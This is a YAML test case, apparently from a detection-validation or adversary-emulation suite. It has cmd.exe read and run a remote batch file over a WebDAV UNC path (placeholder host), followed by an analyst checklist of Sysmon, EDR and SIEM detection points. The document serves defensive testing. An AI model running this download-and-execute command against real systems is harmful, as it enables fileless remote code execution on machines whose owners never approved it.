id: DLEXEC_004_cmd_webdav
name: "Download and Execute — CMD via WebDAV Batch File"
mitre: "T1059.003, T1105"
category: download_execute
description: >
  Executes a remote batch file directly from a WebDAV share using cmd.exe input
  redirection. The file is never written to the local disk — cmd.exe streams and
  executes it directly from the UNC path. Replace PLACEHOLDER_WEBDAV_HOST and
  PLACEHOLDER_BATCHFILE with your WebDAV server and file path.

requirements:
  os: windows
  admin: false

steps:
  - type: marker
    message: "[DLEXEC-004] CMD execution from WebDAV share"

  - type: exec
    binary: cmd.exe
    args: /k < \\PLACEHOLDER_WEBDAV_HOST\PLACEHOLDER_FOLDER\PLACEHOLDER_BATCHFILE.txt
    timeout_seconds: 30

  - type: sleep
    seconds: 30

analyst_checklist:
  - "Sysmon Event ID 1: cmd.exe with UNC path in stdin redirection captured?"
  - "Sysmon Event ID 3: Network connection from cmd.exe to WebDAV host logged?"
  - "EDR: Alert on cmd.exe connecting to a remote WebDAV share for execution?"
  - "EDR: UNC path in cmd.exe argument captured — host and share name visible?"
  - "SIEM: SMB/WebDAV network connection from cmd.exe present?"
  - "Rule opportunity: cmd.exe commandline containing UNC path (\\\\) as input source"
  - "Rule opportunity: cmd.exe making network connection to non-internal host"
  - "Gap check: Many rules focus on powershell.exe — cmd.exe WebDAV execution is often missed."
